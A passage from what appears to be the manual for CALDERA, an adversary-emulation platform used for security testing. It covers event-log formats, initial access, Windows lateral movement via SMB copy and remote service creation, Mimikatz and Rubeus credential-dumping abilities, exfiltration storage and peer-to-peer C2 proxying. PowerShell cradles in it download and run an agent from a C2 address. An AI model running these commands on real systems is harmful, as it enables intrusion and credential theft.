"link_id": "ddf2aa96-24a1-4e71-8360-637a821b0781",
"name": "Find files",
"output": "/Users/foo/bar/credentials.yml",
"pid": 56562,
"platform": "darwin",
"run": "2022-05-11T22:09:07Z",
"status": 0
},
{
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"agent_reported_time": "2022-05-11T22:09:53Z",
"attack": {
"tactic": "collection",
"technique_id": "T1005",
"technique_name": "Data from Local System"
},
"command":
˓→"ZmluZCAvVXNlcnMgLW5hbWUgJyouc3FsJyAtdHlwZSBmIC1ub3QgLXBhdGggJyovXC4qJyAtc2l6ZSAtNTAwayAyPi9kZXYvbnVsb
˓→",
"delegated": "2022-05-11T22:09:12Z",
"description": "Locate files deemed sensitive",
"executor": "sh",
"link_id": "fa7ac865-004d-4296-9d68-fd425a481b5e",
"name": "Find files",
"output": "/Users/foo/bar/sensitive.sql",
"pid": 56809,
"platform": "darwin",
"run": "2022-05-11T22:10:45Z",
"status": 0
},
{
"ability_id": "4e97e699-93d7-4040-b5a3-2e906a58199e",
"agent_reported_time": "2022-05-11T22:10:55Z",
"attack": {
"tactic": "collection",
"technique_id": "T1074.001",
"technique_name": "Data Staged: Local Data Staging"
},
"command":
˓→"Y3AgIi9Vc2Vycy9jamVsbGVuL0RvY3VtZW50cy9kZW1vL1B5VG9yY2hcIE1vZGVscy9teU1vZGVsLW5pZ2h0bHkucHQiIC9Vc2Vyc
˓→",
"delegated": "2022-05-11T22:10:47Z",
(continues on next page)
"pid": 57005,
"platform": "darwin",
"run": "2022-05-11T22:10:55Z",
"status": 1
},
{
"ability_id": "4e97e699-93d7-4040-b5a3-2e906a58199e",
"agent_reported_time": "2022-05-11T22:11:34Z",
"attack": {
"tactic": "collection",
"technique_id": "T1074.001",
"technique_name": "Data Staged: Local Data Staging"
},
"command":
˓→"Y3AgIi9Vc2Vycy9jamVsbGVuL29wdC9hbmFjb25kYTMvZW52cy9mYWlyL2xpYi9weXRob24zLjgvc2l0ZS1wYWNrYWdlcy9zYWNyZ
˓→",
"delegated": "2022-05-11T22:10:57Z",
"description": "copy files to staging directory",
"executor": "sh",
"link_id": "a5ef6774-6eed-4383-a769-420092e1ba27",
"name": "Stage sensitive files",
"pid": 57105,
"platform": "darwin",
"run": "2022-05-11T22:11:34Z",
"status": 0
},
{
"ability_id": "4e97e699-93d7-4040-b5a3-2e906a58199e",
"agent_reported_time": "2022-05-11T22:12:22Z",
"attack": {
"tactic": "collection",
"technique_id": "T1074.001",
"technique_name": "Data Staged: Local Data Staging"
},
"command":
˓→"Y3AgIi9Vc2Vycy9jamVsbGVuL29wdC9hbmFjb25kYTMvbGliL3B5dGhvbjMuOC9zaXRlLXBhY2thZ2VzL3NhY3JlbW9zZXMvZGF0Y
˓→",
"delegated": "2022-05-11T22:11:37Z",
"description": "copy files to staging directory",
"executor": "sh",
"link_id": "b2ba877c-2501-4abc-89a0-aeada909f52b",
"name": "Stage sensitive files",
"pid": 57294,
"platform": "darwin",
"run": "2022-05-11T22:12:22Z",
"status": 0
(continues on next page)
˓→",
"delegated": "2022-05-11T22:12:27Z",
"description": "Compress a directory on the file system",
"executor": "sh",
"link_id": "795b4b12-1355-49ea-96e8-f6d3d045334d",
"name": "Compress staged directory",
"output": "/Users/foo/staged.tar.gz",
"pid": 57383,
"platform": "darwin",
"run": "2022-05-11T22:13:02Z",
"status": 0
},
{
"ability_id": "ea713bc4-63f0-491c-9a6f-0b01d560b87e",
"agent_reported_time": "2022-05-11T22:14:02Z",
"attack": {
"tactic": "exfiltration",
"technique_id": "T1041",
"technique_name": "Exfiltration Over C2 Channel"
},
"command":
˓→"Y3VybCAtRiAiZGF0YT1AL1VzZXJzL2NqZWxsZW4vc3RhZ2VkLnRhci5neiIgLS1oZWFkZXIgIlgtUmVxdWVzdC1JRDogYGhvc3RuY
˓→",
"delegated": "2022-05-11T22:13:07Z",
"description": "Exfil the staged directory",
"executor": "sh",
"link_id": "bda3e573-d751-420b-8740-d4a36cee1f9d",
"name": "Exfil staged directory",
"output": " % Total % Received % Xferd Average Speed Time Time ␣
˓→Time Current Dload Upload Total Spent Left ␣
˓→Speed\r 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\
˓→r100 1357 0 0 100 1357 0 441k --:--:-- --:--:-- --:--:-- 441k",
"pid": 57568,
"platform": "darwin",
"run": "2022-05-11T22:14:02Z",
"status": 0
},
{
"ability_id": "300157e5-f4ad-4569-b533-9d1fa0e74d74",
"agent_reported_time": "2022-05-11T22:15:01Z",
"attack": {
(continues on next page)
The operation event logs JSON file can be downloaded via the Download event logs button on the operations modal
after selecting an operation from the drop-down menu. To include command output, users should select the include
agent output option. Operation event logs will also be automatically written to disk when an operation completes -
see the section on automatic event log generation.
The event logs JSON is a list of dictionary objects, where each dictionary represents an event that occurred during the
operation (i.e. each link/command). Users can think of this as a “flattened” version of the operation steps displayed
in the traditional report JSON format. However, not all of the operation or agent metadata from the operation report
is included in the operation event logs. The event logs do not include operation facts, nor do they include operation
links/commands that were skipped either manually or because certain requirements were not met (e.g. missing facts or
insufficient privileges). The event log JSON format makes it more convenient to import into databases or SIEM tools.
The event dictionary has the following keys and values:
• command: base64-encoded command that was executed
• delegated_timestamp: Timestamp string in YYYY-MM-DD HH:MM:SS format that indicates when the op-
eration made the link available for collection
• collected_timestamp: Timestamp in YYYY-MM-DD HH:MM:SS format that indicates when the agent col-
lected the link available for collection
• finished_timestamp: Timestamp in YYYY-MM-DD HH:MM:SS format that indicates when the agent sub-
mitted the link execution results to the C2 server.
• status: link execution status
• platform: target platform for the agent running the link (e.g. “windows”)
• executor: executor used to run the link command (e.g. “psh” for powershell)
• pid: process ID for the link
• agent_metadata: dictionary containing the following information for the agent that ran the link:
– paw
– group
– architecture
– username
– location
– pid
– ppid
– privilege
– host
– contact
– created
• ability_metadata: dictionary containing the following information about the link ability:
– ability_id
– ability_name
– ability_description
• operation_metadata: dictionary containing the following information about the operation that generated the
link event:
– operation_name
– operation_start: operation start time in YYYY-MM-DD HH:MM:SS format
– operation_adversary: name of the adversary used in the operation
• attack_metadata: dictionary containing the following ATT&CK information for the ability associated with
the link:
– tactic
– technique_id
– technique_name
• output: if the user selected include agent output when downloading the operation event logs, this field
will contain the agent-provided output from running the link command.
• agent_reported_time: Timestamp string representing the time at which the execution was ran by the agent
in YYYY-MM-DD HH:MM:SS format. This field will not be present if the agent does not support reporting the
command execution time.
Below is a sample output for operation event logs:
[
{
"command":
˓→"R2V0LUNoaWxkSXRlbSBDOlxVc2VycyAtUmVjdXJzZSAtSW5jbHVkZSAqLnBuZyAtRXJyb3JBY3Rpb24gJ1NpbGVudGx5Q29udGlud
˓→",
"delegated_timestamp": "2021-02-23T11:50:12Z",
"collected_timestamp": "2021-02-23T11:50:14Z",
"finished_timestamp": "2021-02-23T11:50:14Z",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 7016,
"agent_metadata": {
"paw": "pertbn",
"group": "red",
"architecture": "amd64",
"username": "BYZANTIUM\\Carlomagno",
"location": "C:\\Users\\Public\\sandcat.exe",
"pid": 5896,
"ppid": 2624,
"privilege": "Elevated",
"host": "WORKSTATION1",
"contact": "HTTP",
"created": "2021-02-23T11:48:33Z"
},
"ability_metadata": {
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"ability_name": "Find files",
"ability_description": "Locate files deemed sensitive"
},
"operation_metadata": {
"operation_name": "My Operation",
"operation_start": "2021-02-23T11:50:12Z",
"operation_adversary": "Collection"
},
"attack_metadata": {
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005"
},
(continues on next page)
˓→",
"delegated_timestamp": "2021-02-23T11:50:17Z",
"collected_timestamp": "2021-02-23T11:50:21Z",
"finished_timestamp": "2021-02-23T11:50:21Z",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 1048,
"agent_metadata": {
"paw": "pertbn",
"group": "red",
"architecture": "amd64",
"username": "BYZANTIUM\\Carlomagno",
"location": "C:\\Users\\Public\\sandcat.exe",
"pid": 5896,
"ppid": 2624,
"privilege": "Elevated",
"host": "WORKSTATION1",
"contact": "HTTP",
"created": "2021-02-23T11:48:33Z"
},
"ability_metadata": {
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"ability_name": "Find files",
"ability_description": "Locate files deemed sensitive"
},
"operation_metadata": {
"operation_name": "My Operation",
"operation_start": "2021-02-23T11:50:12Z",
"operation_adversary": "Collection"
},
"attack_metadata": {
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005"
},
"agent_reported_time": "2021-02-23T11:50:18Z"
},
{
"command":
˓→"R2V0LUNoaWxkSXRlbSBDOlxVc2VycyAtUmVjdXJzZSAtSW5jbHVkZSAqLndhdiAtRXJyb3JBY3Rpb24gJ1NpbGVudGx5Q29udGlud
˓→",
"delegated_timestamp": "2021-02-23T11:50:22Z",
"collected_timestamp": "2021-02-23T11:50:27Z",
"finished_timestamp": "2021-02-23T11:50:27Z",
"status": 0,
"platform": "windows",
(continues on next page)
˓→",
"delegated_timestamp": "2021-02-23T11:50:32Z",
"collected_timestamp": "2021-02-23T11:50:37Z",
"finished_timestamp": "2021-02-23T11:50:37Z",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 3212,
"agent_metadata": {
"paw": "pertbn",
"group": "red",
"architecture": "amd64",
"username": "BYZANTIUM\\Carlomagno",
"location": "C:\\Users\\Public\\sandcat.exe",
"pid": 5896,
"ppid": 2624,
"privilege": "Elevated",
(continues on next page)
When an operation terminates, the corresponding event logs will be written to disk in the same format as if they were
manually requested for download. These event logs will contain command output and will be unencrypted on disk.
Each operation will have its own event logs written to a separate file in the directory $reports_dir/event_logs,
where $reports_dir is the reports_dir entry in the CALDERA configuration file. The filename will be of the
format operation_$id.json, where $id is the unique ID of the operation.
TWELVE
CALDERA allows for easy initial access attacks, by leveraging the Access plugin. This guide will walk you through
how to fire off an initial access attack, as well as how to build your own.
Start by deploying an agent locally. This agent will be your “assistant”. It will execute any attack you feed it. You could
alternatively deploy the agent remotely, which will help mask where your initial access attacks are originating.
From the Access plugin, select your agent and either the initial access tactic or any pre-ATT&CK tactic. This will filter
the abilities. Select any ability within your chosen tactic.
Once selected, a pop-up box will show you details about the ability. You’ll need to fill in values for any properties your
selected ability requires. Click OK when done.
Finally, click to run the ability against your selected agent. The ability will be in one of 3 states: IN-PROGRESS,
SUCCESS or FAILED. If it is in either of the latter two states, you can view the logs from the executed ability by
clicking on the star.
You can easily add new initial access or pre-ATT&CK abilities yourself.
You can use an existing binary or write your own - in any language - to act as your payload. The binary itself should
contain the code to execute your attack. It can be as simple or complex as you’d like. It should accept parameters for
any dynamic behaviors. At minimum, you should require a parameter for “target”, which would be your intended IP
address, FQDN or other target that your attack will run against.
As an example, look at the scanner.sh binary used for conducting a simple NMAP scan:
#!/bin/bash
This binary simply echos a few log statements and runs an NMAP scan against the first parameter (i.e., the target)
passed to it.
65
caldera
With your binary at hand, you can now create a new ability YML file inside the Access plugin (plug-
ins/access/data/abilities/*). Select the correct tactic directory (or create one if one does not exist). Here is what the
YML file looks like for the scanner.sh binary:
---
- id: 567eaaba-94cc-4a27-83f8-768e5638f4e1
name: NMAP scan
description: Scan an external host for open ports and services
tactic: technical-information-gathering
technique:
name: Conduct active scanning
attack_id: T1254
platforms:
darwin,linux:
sh:
command: |
./scanner.sh #{target.ip}
timeout: 300
payloads:
- scanner.sh
This is the same format that is used for other CALDERA abilities, so refer to the Learning the terminology page for a
run-through of all the fields.
With your ability YML file loaded, restart CALDERA and head to the Access plugin to run it.
THIRTEEN
Exercising Caldera’s lateral movement and remote execution abilities allows you to test how easily an adversary can
move within your network. This guide will walk you through some of the necessary setup steps to get started with
testing lateral movement in a Windows environment.
13.1 Setup
The firewall of the target host should not be blocking UDP ports 137 and 138 and TCP ports 139 and 445. The firewall
should also allow inbound file and printer sharing.
netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
This guide will assume a user with administrative privileges to the target host has been compromised and that a
CALDERA agent has been spawned with this user’s privileges. Some methods of lateral movement may depend on
whether (1) the user has administrative privileges but is not a domain account or (2) the user has administrative privi-
leges and is a domain account. The example walkthrough in this guide should not be impacted by these distinctions.
Lateral movement can be a combination of two steps. The first requires confirmation of remote access to the next target
host and the movement or upload of the remote access tool (RAT) executable to the host. The second part requires
execution of the binary, which upon callback of the RAT on the new host would complete the lateral movement.
Most of CALDERA’s lateral movement and execution abilities found in Stockpile have fact or relationship requirements
that must be satisfied. This information may be passed to the operation in two ways:
67
caldera
1. The fact and relationship information may be added to an operation’s source. A new source can be created or
this information can be added to an already existing source as long as that source is used by the operation. When
configuring an operation, open the “AUTONOMOUS” drop down section and select “Use [insert source name]
facts” to indicate to the operation that it should take in fact and relationship information from the selected source.
2. The fact and relationship information can be discovered by an operation. This requires additional abilities to be
run prior to the lateral movement and execution abilities to collect the necessary fact and relationship information
necessary to satisfy the ability requirements.
There are several ways a binary can be moved or uploaded from one host to another. Some example methods used in
CALDERA’s lateral movement abilities include:
1. WinRM
2. SCP
3. wmic
4. SMB
5. psexec
Based on the tool used, additional permissions may need to be changed in order for users to conduct these actions
remotely.
CALDERA’s Stockpile execution abilities relevant to lateral movement mainly use wmic to remotely start the binary.
Some additional execution methods include modifications to Windows services and scheduled tasks. The example in
this guide will use the creation of a service to remotely start the binary (ability file included at the end of this guide).
See ATT&CK’s Execution tactic page for more details on execution methods.
Using the adversary profile in this guide and CALDERA’s Debrief plugin, you can view the path an adversary took
through the network via lateral movement attempts. In the Debrief modal, select the operation where lateral movement
was attempted then select the Attack Path view from the upper right hand corner of graph views. This graph displays
the originating C2 server and agent nodes connected by the execution command linking the originating agent to the
newly spawned agent.
In the example attack path graph below, the Service Creation Lateral Movement adversary profile was run on the win10
host, which moved laterally to the VAGRANTDC machine via successful execution of the Service Creation ability.
This capability relies on the origin_link_id field to be populated within the agent profile upon first check-in and
is currently implemented for the default agent, Sandcat. For more information about the #{origin_link_id} global
variable, see the explanation of Command in the What is an Ability? section of the Learning the Terminology guide.
For more information about how lateral movement tracking is implemented in agents to be used with CALDERA, see
the Lateral Movement Tracking section of the How to Build Agents guide.
This section will walkthrough the necessary steps for proper execution of the Service Creation Lateral Movement
adversary profile. This section will assume successful setup from the previous sections mentioned in this guide and
that a Sandcat agent has been spawned with administrative privileges to the remote target host. The full ability files
used in this adversary profile are included at the end of this guide.
1. Go to navigate pane > Advanced > sources. This should open a new sources modal in the web GUI.
2. Click the toggle to create a new source. Enter “SC Source” as the source name. Then enter remote.host.fqdn
as the fact name and the FQDN of the target host you are looking to move laterally to as the fact value. Click
Save once source configuration has been completed.
3. Go to navigate pane > Campaigns > operations. Click the toggle to create a new operation. Under BASIC
OPTIONS select the group with the relevant agent and the Service Creation Lateral Movement profile. Under
AUTONOMOUS, select Use SC Source facts. If the source created from the previous step is not available in the
drop down, try refreshing the page.
4. Once operation configurations have been completed, click Start to start the operation.
5. Check the agents list for a new agent on the target host.
- id: deeac480-5c2a-42b5-90bb-41675ee53c7e
name: View remote shares
description: View the shares of a remote host
tactic: discovery
technique:
attack_id: T1135
name: Network Share Discovery
platforms:
windows:
psh:
command: net view \\#{remote.host.fqdn} /all
parsers:
plugins.stockpile.app.parsers.net_view:
- source: remote.host.fqdn
edge: has_share
target: remote.host.share
cmd:
command: net view \\#{remote.host.fqdn} /all
parsers:
plugins.stockpile.app.parsers.net_view:
- source: remote.host.fqdn
edge: has_share
target: remote.host.share
- id: 65048ec1-f7ca-49d3-9410-10813e472b30
name: Copy Sandcat (SMB)
description: Copy Sandcat to remote host (SMB)
tactic: lateral-movement
technique:
attack_id: T1021.002
name: "Remote Services: SMB/Windows Admin Shares"
platforms:
windows:
psh:
command: |
$path = "sandcat.go-windows";
$drive = "\\#{remote.host.fqdn}\C$";
Copy-Item -v -Path $path -Destination $drive"\Users\Public\s4ndc4t.exe";
cleanup: |
$drive = "\\#{remote.host.fqdn}\C$";
Remove-Item -Path $drive"\Users\Public\s4ndc4t.exe" -Force;
parsers:
plugins.stockpile.app.parsers.54ndc47_remote_copy:
- source: remote.host.fqdn
edge: has_54ndc47_copy
payloads:
- sandcat.go-windows
requirements:
- plugins.stockpile.app.requirements.not_exists:
- source: remote.host.fqdn
edge: has_54ndc47_copy
(continues on next page)
- id: 95727b87-175c-4a69-8c7a-a5d82746a753
name: Service Creation
description: Create a service named "sandsvc" to execute remote Sandcat binary named
˓→"s4ndc4t.exe"
tactic: execution
technique:
attack_id: T1569.002
name: 'System Services: Service Execution'
platforms:
windows:
psh:
timeout: 300
cleanup: |
sc.exe \\#{remote.host.fqdn} stop sandsvc;
sc.exe \\#{remote.host.fqdn} delete sandsvc /f;
taskkill /s \\#{remote.host.fqdn} /FI "Imagename eq s4ndc4t.exe"
command: |
sc.exe \\#{remote.host.fqdn} create sandsvc start= demand error= ignore␣
˓→binpath= "cmd /c start C:\Users\Public\s4ndc4t.exe -server #{server} -v -originLinkID #
FOURTEEN
DYNAMICALLY-COMPILED PAYLOADS
The Builder plugin can be used to create dynamically-compiled payloads. Currently, the plugin supports C#, C, C++,
and Golang.
Code is compiled in a Docker container. The resulting executable, along with any additional references, will be copied
to the remote machine and executed.
Details for the available languages are below:
• csharp: Compile C# executable using Mono
• cpp_windows_x64: Compile 64-bit Windows C++ executable using MXE/MinGW-w64
• cpp_windows_x86: Compile 64-bit Windows C++ executable using MXE/MinGW-w64
• c_windows_x64: Compile 64-bit Windows C executable using MXE/MinGW-w64
• c_windows_x86: Compile 64-bit Windows C executable using MXE/MinGW-w64
• go_windows: Build Golang executable for Windows
The following “Hello World” ability can be used as a template for C# ability development:
---
- id: 096a4e60-e761-4c16-891a-3dc4eff02e74
name: Test C# Hello World
description: Dynamically compile HelloWorld.exe
tactic: execution
technique:
attack_id: T1059
name: Command-Line Interface
platforms:
windows:
psh,cmd:
build_target: HelloWorld.exe
language: csharp
code: |
using System;
namespace HelloWorld
{
(continues on next page)
73
caldera
It is possible to reference a source code file as well. The source code file should be in the plugin’s payloads/ directory.
This is shown in the example below:
---
- id: 096a4e60-e761-4c16-891a-3dc4eff02e74
name: Test C# Hello World
description: Dynamically compile HelloWorld.exe
tactic: execution
technique:
attack_id: T1059
name: Command-Line Interface
platforms:
windows:
psh,cmd:
build_target: HelloWorld.exe
language: csharp
code: HelloWorld.cs
14.2.1 Arguments
It is possible to call dynamically-compiled executables with command line arguments by setting the ability command
value. This allows for the passing of facts into the ability. The following example demonstrates this:
---
- id: ac6106b3-4a45-4b5f-bebf-0bef13ba7c81
name: Test C# Code with Arguments
description: Hello Name
tactic: execution
technique:
attack_id: T1059
name: Command-Line Interface
platforms:
windows:
psh,cmd:
build_target: HelloName.exe
command: .\HelloName.exe "#{paw}"
language: csharp
(continues on next page)
namespace HelloWorld
{
class Program
{
static void Main(string[] args)
{
if (args.Length == 0) {
Console.WriteLine("No name provided");
}
else {
Console.WriteLine("Hello " + Convert.ToString(args[0]));
}
}
}
}
DLL dependencies can be added, at both compilation and execution times, using the ability payload field. The refer-
enced library should be in a plugin’s payloads folder, the same as any other payload.
The following ability references SharpSploit.dll and dumps logon passwords using Mimikatz:
---
- id: 16bc2258-3b67-46c1-afb3-5269b6171c7e
name: SharpSploit Mimikatz (DLL Dependency)
description: SharpSploit Mimikatz
tactic: credential-access
technique:
attack_id: T1003
name: Credential Dumping
privilege: Elevated
platforms:
windows:
psh,cmd:
build_target: CredDump.exe
language: csharp
code: |
using System;
using System.IO;
using SharpSploit;
namespace CredDump
{
class Program
{
static void Main(string[] args)
(continues on next page)
Console.WriteLine(logonPasswords);
}
}
}
parsers:
plugins.stockpile.app.parsers.katz:
- source: domain.user.name
edge: has_password
target: domain.user.password
- source: domain.user.name
edge: has_hash
target: domain.user.ntlm
- source: domain.user.name
edge: has_hash
target: domain.user.sha1
payloads:
- SharpSploit.dll
14.2.3 Donut
---
- id: 7edeece0-9a0e-4fdc-a93d-86fe2ff8ad55
name: Test Donut with Arguments
description: Hello Name Donut
tactic: execution
technique:
attack_id: T1059
name: Command-Line Interface
platforms:
windows:
donut_amd64:
build_target: HelloNameDonut.donut
command: .\HelloNameDonut.donut "#{paw}" "#{server}"
language: csharp
(continues on next page)
namespace HelloNameDonut
{
class Program
{
static void Main(string[] args)
{
if (args.Length < 2) {
Console.WriteLine("No name, no server");
}
else {
Console.WriteLine("Hello " + Convert.ToString(args[0]) + " from
˓→" + Convert.ToString(args[1]));
}
}
}
}
Donut can also be used to read from pre-compiled executables. .NET Framework 4 is required. Executables will be
found with either a .donut.exe or a .exe extension, and .donut.exe extensions will be prioritized. The following
example will transform a payload named Rubeus.donut.exe into shellcode which will be executed in memory. Note
that Rubeus.donut is specified in the payload and command:
---
- id: 043d6200-0541-41ee-bc7f-bcc6ba15facd
name: TGT Dump
description: Dump TGT tickets with Rubeus
tactic: credential-access
technique:
attack_id: T1558
name: Steal or Forge Kerberos Tickets
privilege: Elevated
platforms:
windows:
donut_amd64:
command: .\Rubeus.donut dump /nowrap
payloads:
- Rubeus.donut
FIFTEEN
EXFILTRATION
After completing an operation a user may want to review the data retreived from the target system. This data is auto-
matically stored on the CALDERA server in a directory specified in /conf/default.yml.
Some abilities will transfer files from the agent to the CALDERA server. This can be done manually with
Note: localhost could be rejected in place of the server IP. In this case you will get error 7. You should type out the
full IP. These files are sent from the agent to server_ip/file/upload at which point the server places these files inside the
directory specified by /conf/default.yml to key “exfil_dir”. By default it is set to /tmp/caldera.
The server stores all exfiltrated files inside the directory specified by /conf/default.yml to key “exfil_dir”. By default it
is set to /tmp/caldera.
Files can be accessed by pulling them directly from that location when on the server and manually unencrypting the
files.
To simplify accessing exfiltrated files from a running caldera server, you can go the the advanced section in the
CALDERA UI and click on the ‘exfilled files’ section.
From there you can select an operation (or all) from the drop down to see a listing of all the files in the exfil folder
corresponding to the operation (specifically works with sandcat agents or any other agent using the same naming scheme
for file upload folder) or in the directory along with the option to select any number of files to download directly to
your machine.
All downloaded files will be unencrypted before passing along as a download.
79
caldera
After the server is shut down the reports from operations are placed inside the directory specified by the /conf/default.yml
to key “reports_dir”. By default it is also set to /tmp.
The reports and exfiltrated files are encrypted on the server. To view the file contents the user will have to decrypt the
file using /app/utility/file_decryptor.py . This can be performed with:
The output file will already have the _decrypted tag appended to the end of the file name once the decrypted file is
created by the python script.
SIXTEEN
In certain scenarios, an agent may start on a machine that can’t directly connect to the C2 server. For instance, agent
A may laterally move to a machine that is on an internal network and cannot beacon out to the C2. By giving agents
peer-to-peer capabilities, users can overcome these limitations. Peer-to-peer proxy-enabled agents can relay messages
and act as proxies between the C2 server and peers, giving users more flexibility in their Caldera operations.
This guide will explain how Sandcat incorporates peer-to-peer proxy functionality and how users can include it in their
operations.
By default, a Sandcat agent will try to connect to its defined C2 server using the provided C2 protocol (e.g. HTTP).
Under ideal circumstances, the requested C2 server is valid and reachable by the agent, and no issues occur. Because
agents cannot guarantee that the requested C2 server is valid, that the requested C2 protocol is valid and supported by
the agent, nor that the C2 server is even reachable, the agent will fall back to peer-to-peer proxy methods as a backup
method. The order of events is as follows:
1. Agent checks if the provided C2 protocol is valid and supported. If not, the agent resorts to peer-to-peer proxy.
2. If the C2 protocol is valid and supported, the agent will try to reach out to the provided C2 server using that
protocol. If the agent gets a successful Beacon, then it continues using the established C2 protocol and server.
If the agent misses 3 Beacons in a row (even after having successfully Beaconed in the past), then the agent will
fall back to peer-to-peer proxy.
When falling back to peer-to-peer proxy methods, the agent does the following:
1. Search through all known peer proxy receivers and see if any of their protocols are supported.
2. If the agent finds a peer proxy protocol it can use, it will switch its C2 server and C2 protocol to one of the available
corresponding peer proxy locations and the associated peer proxy protocol. For example, if an agent cannot
successfully make HTTP requests to the C2 server at http://10.1.1.1:8080, but it knows that another agent
is proxying peer communications through an SMB pipe path available at \\WORKSTATION\pipe\proxypipe,
then the agent will check if it supports SMB Pipe peer-to-peer proxy capabilities. If so (i.e. if the associated
gocat extension was included in the Sandcat binary), then the agent will change its server to \\WORKSTATION\
pipe\proxypipe and its C2 protocol to SmbPipe.
The agent also keeps track of which peer proxy receivers it has tried so far, and it will round-robin through each one
it hasn’t tried until it finds one it can use. If the agent cannot use any of the available peer proxy receivers, or if they
happen to all be offline or unreachable, then the agent will pause and try each one again.
81
caldera
Since an agent that requires peer-to-peer communication can’t reach the C2 server, it needs a way to obtain the available
proxy peer receivers (their protocols and where to find them). Currently, Caldera achieves this by including available
peer receiver information in the dynamically-compiled binaries. When agents hosting peer proxy receivers check in
through a successful beacon to the C2, the agents will include their peer-to-peer proxy receiver addresses and corre-
sponding protocols, if any. The C2 server will store this information to later include in a dynamically compiled binary
upon user request.
Users can compile a Sandcat binary that includes known available peer-to-peer receivers (their protocols and locations),
by using the includeProxyPeers header when sending the HTTP requests to the Caldera server for agent binary
compilation. In order for a receiver to be included, the agent hosting the receiver must be trusted, and the peer-to-peer
protocol for the receiver must be included in the header value.
The header value can take one of the following formats:
• All : include all available receivers
• protocol1,protocol2,protocol3 : include only the proxy receivers that follow the requested protocols
(comma-separated).
• !protcol1,protocol2,protocol3 : include all available receivers, EXCEPT those that use the indicated
protocols.
By specifying protocols, users have greater control over their agents’ communication, especially when they do not want
particular protocols to appear in the local network traffic.
For example, suppose trusted agents A, B, C are each running HTTP proxy receivers at network addresses http://10.
1.1.11:8081, http://10.1.1.12:8082, http://10.1.1.13:8083, respectively. The peer-to-peer proxy protocol
is HTTP. When compiling a binary with the HTTP header includeProxyPeers:All or includeProxyPeers:HTTP,
the binary will contain all 3 URLs for the agent to use in case it cannot connect to the specified C2.
To leverage peer-to-peer functionality, one or more gocat extensions may need to be installed. This can be done
through cradles by including the gocat-extensions header when sending HTTP requests to the Caldera server for
dynamic Sandcat compilation. The header value will be a comma-separated list of all the desired extensions (e.g.
proxy_method1,proxy_method2). If the requested extension is supported and available within the user’s current
Caldera installation, then the extension will be included.
Quickstart
Starting Receivers
To start an agent with peer-to-peer proxy receivers, the -listenP2P commandline switch must be used (no parameters
taken). When this switch is set, the agent will activate all supported peer-to-peer proxy receivers.
Example powershell commands to start an agent with HTTP and SMB Pipe receivers:
$url="http://192.168.137.122:8888/file/download";
$wc=New-Object System.Net.WebClient;
$wc.Headers.add("platform","windows");
$wc.Headers.add("file","sandcat.go");
$wc.Headers.add("gocat-extensions","proxy_http,proxy_smb_pipe"); # Include gocat␣
˓→extensions for the proxy protocols.
$output="C:\Users\Public\sandcat.exe";
$wc.DownloadFile($url,$output);
C:\Users\Public\sandcat.exe -server http://192.168.137.122:8888 -v -listenP2P;
In cases where operators know ahead of time that a newly spawned agent cannot directly connect to the C2, they can
use the existing command-line options for Sandcat to have the new agent connect to a peer. To do so, the -c2 and
-server options are set to the peer-to-peer proxy protocol and address of the peer’s proxy receiver, respectively.
For example, suppose trusted agent A is running an SMB pipe proxy receiver at pipe path \\WORKSTATION1\
pipe\agentpipe. Instead of compiling a new agent using the HTTP header includeProxyPeers:All or
includeProxyPeers:SmbPipe to include the pipe path information in the binary, operators can simply specify -c2
SmbPipe and -server \\WORKSTATION1\pipe\agentpipe in the command to run the agent. Note that in this in-
stance, the appropriate SMB pipe proxy gocat extension will need to be installed when compiling the agent binaries.
Example powershell commands to start an agent and have it directly connect to a peer’s SMB pipe proxy receiver:
$url="http://192.168.137.122:8888/file/download";
$wc=New-Object System.Net.WebClient;
$wc.Headers.add("platform","windows");
$wc.Headers.add("file","sandcat.go");
$wc.Headers.add("gocat-extensions","proxy_smb_pipe"); # Required extension for SMB Pipe␣
˓→proxy.
$output="C:\Users\Public\sandcat.exe";
$wc.DownloadFile($url,$output);
# ...
# ... transfer SMB Pipe-enabled binary to new machine via lateral movement technique
# ...
In complex circumstances, operators can create proxy chains of agents, where communication with the C2 traverses
several hops through agent peer-to-peer links. The peer-to-peer proxy links do not need to all use the same proxy
protocol. If an agent is running a peer-to-peer proxy receiver via the -listenP2P command-line flag, and if the agent
uses peer-to-peer communications to reach the C2 (either automatically or manually), then the chaining will occur
automatically without additional user interaction.
Manual example - run peer proxy receivers, but manually connect to another agent’s pipe to communicate with the C2:
At the core of the Sandcat peer-to-peer functionality are the peer-to-peer clients and peer-to-peer receivers. Agents
can operate one or both, and can support multiple variants of each. For instance, an agent that cannot directly reach
the C2 server would run a peer-to-peer client that will reach out to a peer-to-peer receiver running on a peer agent.
Depending on the gocat extensions that each agent supports, an agent could run many different types of peer-to-peer
receivers simultaneously in order to maximize the likelihood of successful proxied peer-to-peer communication.
Direct communication between the Sandcat agent and the C2 server is defined by the Contact interface in the contact.go
file within the contact gocat package. Because all peer-to-peer communication eventually gets proxied to the C2
server, agents essentially treat their peer proxy receivers as just another server.
The peer-to-peer proxy receiver functionality is defined in the P2pReceiver interface in the proxy.go file within the
proxy gocat package. Each implementation requires the following:
• Method to initialize the receiver
• Method to run the receiver itself as a go routine (provide the forwarding proxy functionality)
• Methods to update the upstream server and communication implementation
• Method to cleanly terminate the receiver.
• Method to get the local receiver addresses.
The Sandcat agent currently supports one peer-to-peer proxy: a basic HTTP proxy. Agents that want to use the HTTP
peer-to-peer proxy can connect to the C2 server via an HTTP proxy running on another agent. Agent A can start an
HTTP proxy receiver (essentially a proxy listener) and forward any requests/responses. Because the nature of an HTTP
proxy receiver implies that the running agent will send HTTP requests upstream, an agent must be using the HTTP c2
protocol in order to successfully provide HTTP proxy receiver services.
The peer-to-peer HTTP client is the same HTTP implementation of the Contact interface, meaning that an agent simply
needs to use the HTTP c2 protocol in order to connect to an HTTP proxy receiver.
In order to run an HTTP proxy receiver, the Sandcat agent must have the proxy_http gocat extension installed.
Example commands:
$url="http://192.168.137.122:8888/file/download";
